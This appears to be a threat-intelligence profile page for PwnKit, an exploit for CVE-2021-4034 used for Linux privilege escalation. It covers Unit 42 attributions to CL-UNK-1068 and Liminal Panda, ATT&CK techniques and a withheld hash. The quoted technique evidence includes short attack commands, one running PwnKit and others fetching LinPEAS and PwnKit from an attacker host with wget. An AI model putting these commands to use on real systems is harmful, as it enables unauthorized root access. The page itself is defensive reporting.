Mallory
Malware. Used by 2 actors. Exploits 1 CVE.

PwnKit

PwnKit is a self-contained exploit for CVE-2021-4034 used to achieve local privilege escalation on Linux systems. In the provided reporting, it was deployed post-compromise by multiple intrusion clusters as part of broader intrusion toolchains rather than as an initial access vector. Unit 42 observed Chinese-linked cluster CL-UNK-1068 using PwnKit for Linux privilege escalation during cyberespionage-oriented intrusions targeting high-value organizations across South, Southeast, and East Asia, including government, critical infrastructure, technology, telecommunications, aviation, energy, law enforcement, and pharmaceutical sectors. Unit 42 also reported use of PwnKit by cluster CL-STA-0969 in 2024 against telecommunications providers in Southwest Asia, where the actor likely gained initial access via SSH brute force and then used PwnKit, DirtyCoW, and sudo Baron Samedit for privilege escalation. In that activity, CL-STA-0969 overlapped with activity attributed to Liminal Panda and showed tooling overlaps with Light Basin and several UNC clusters. The content explicitly identifies PwnKit as Linux privilege-escalation tooling and notes that Unit 42 published SHA-256 IOCs for PwnKit among other tools associated with CL-STA-0969.


EXPLOITED CVES

Vulnerabilities exploited

1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.

1 CVE
CVE-2021-4034: PwnKit local privilege escalation in polkit pkexec

“The threat actor used PwnKit, a self-contained exploit for CVE-2021-4034.”

via Palo Alto Networks Unit 42 blog (unit42.paloaltonetworks.com)
THREAT ACTORS

Groups observed using it

2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

Liminal Panda

“The threat actor used PwnKit, a self-contained exploit for CVE-2021-4034.”

via Palo Alto Networks Unit 42 blog (unit42.paloaltonetworks.com)
CL-UNK-1068

“Attackers deployed PwnKit, a self-contained exploit (CVE-2021-4034) to achieve local privilege escalation on Linux systems.”

via Palo Alto Networks Unit 42 blog (unit42.paloaltonetworks.com)
MITRE ATT&CK

Techniques & procedures

3 distinct techniques documented for this family, organized by ATT&CK tactic.

Privilege Escalation

1 technique
T1068 Exploitation for Privilege Escalation (evidence: 3)

Vector 4 - PwnKit (CVE-2021-4034) ... It allows any unprivileged local user to escalate to root ... ./PwnKit

Stealth

1 technique
T1027 Obfuscated Files or Information (evidence: 1)

Base64-encoded payloads including chisel.b64, pwnkit_b64, neo.jspx.b64 and payload.b64; chunked ELF binary delivery; AES-encrypted Neo-reGeorg webshell channel; custom Base64 alphabet.

Command and Control

1 technique
T1105 Ingress Tool Transfer (evidence: 1)

With a stable shell, I transferred LinPEAS to the target using a Python HTTP server ... wget http://192.168.100.199/linpeas.sh ... On the target ... wget http://192.168.100.199/PwnKit

INDICATORS OF COMPROMISE

IOCs tracked for this family

1 indicator attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

Hashes: 1 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Type: hash.sha256 | Value: withheld on the public page | Latest sighting: 11 months ago